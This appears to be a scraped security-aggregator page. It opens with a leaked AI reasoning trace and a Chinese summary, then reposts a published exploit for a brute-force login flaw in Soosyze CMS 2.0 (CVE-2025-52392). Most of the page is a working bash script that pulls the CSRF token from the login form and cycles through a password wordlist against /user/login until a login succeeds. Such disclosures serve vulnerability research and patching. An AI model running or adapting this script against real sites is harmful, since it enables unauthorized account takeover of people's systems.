嗯,用户让我帮忙总结一下这篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,找出关键点。 文章标题是关于Soosyze CMS 2.0的暴力破解登录漏洞。描述部分提到由于缺少速率限制和账户锁定机制,攻击者可以通过/user/login路径进行无限次的POST请求,使用已知用户名和密码字典来尝试登录。这可能导致未经授权的访问,属于CWE-307漏洞。 此外,文章还提供了一个PoC脚本,展示了如何利用这个漏洞。脚本允许用户指定密码字典,默认情况下使用一些常见的密码。 总结的时候,我需要涵盖漏洞名称、软件版本、问题原因、攻击方式以及可能的影响。同时要保持简洁,在100字以内。 可能的结构是:Soosyze CMS 2.0存在暴力破解漏洞,因缺少速率限制和账户锁定机制,攻击者可利用/user/login路径进行无限次尝试,导致未经授权访问(CVE-2025-52392)。 这样既涵盖了关键点,又符合用户的要求。 </think> Soosyze CMS 2.0 存在暴力破解登录漏洞,因缺少速率限制和账户锁定机制,攻击者可通过 `/user/login` 路径提交无限次 POST 请求尝试密码字典,可能导致未经授权访问(CVE-2025-52392)。 2025-12-17 23:1:31 Author: cxsecurity.com(查看原文) 阅读量:3 收藏
# Exploit Title: Soosyze CMS 2.0 - Brute Force Login # Google Dork: N/A # Date: 2025-08-13 # Exploit Author: Beatriz Fresno Naumova (beafn28) # Vendor Homepage: https://soosyze.com/ # Software Link: https://github.com/soosyze/soosyze # Version: 2.0 (tested) # Tested on: macOS Sonoma 14.x (Apple Silicon M1), /bin/bash 3.2 & Homebrew bash 5.2, curl 8.x, BSD sed # CVE : CVE-2025-52392 # Description: # Soosyze CMS 2.0 allows brute-force login attacks via /user/login due to missing rate limiting # and account lockout mechanisms. An attacker can submit unlimited POST requests with a known # username/email and a password wordlist, potentially gaining unauthorized access (CWE-307). # PoC Usage: # ./script.sh [wordlist.txt] # If no wordlist is provided, a dictionary is used. #!/usr/bin/env bash set -euo pipefail BASE_URL="http://localhost:8000" LOGIN_PATH="/user/login" EMAIL_FIELD="email" PASS_FIELD="password" TARGET_EMAIL="[email protected]" WORDLIST_FILE="${1:-}" DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1") form_url="$BASE_URL$LOGIN_PATH" COOKIE_JAR="$(mktemp)" get_form() { curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > /tmp/login_page.html } extract_token() { local name value name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/\1/p' /tmp/login_page.html | head -n1 || true) value="" if [[ -n "$name" ]]; then value=$(sed -nE "s/.*name=\"$name\".*value=\"([^\"]*)\".*/\1/p" /tmp/login_page.html | head -n1 || true) fi printf '%s\t%s\n' "$name" "$value" } post_login() { local pass="$1" tname="$2" tval="$3" curl -sS -o /tmp/resp.html -w "%{http_code}" \ -c "$COOKIE_JAR" -b "$COOKIE_JAR" \ -X POST "$form_url" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Origin: $BASE_URL" -H "Referer: $form_url" \ --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" \ --data-urlencode "$PASS_FIELD=$pass" \ $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" ) } echo "[*] Starting brute-force attack on $form_url" [[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}") i=0 for pw in "${words[@]}"; do i=$((i+1)) get_form IFS=$'\t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token) code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE") if grep -q '"redirect"' /tmp/resp.html; then echo -e "[$i] Password found: '\e[1m$pw\e[0m' (HTTP $code)" break else echo "[$i] '$pw' (HTTP $code)" fi sleep 0.$((RANDOM%9+1)) done rm -f "$COOKIE_JAR" /tmp/resp.html
Thanks for you comment!
Your message is in quarantine 48 hours.
如有侵权请联系:admin#unsafe.sh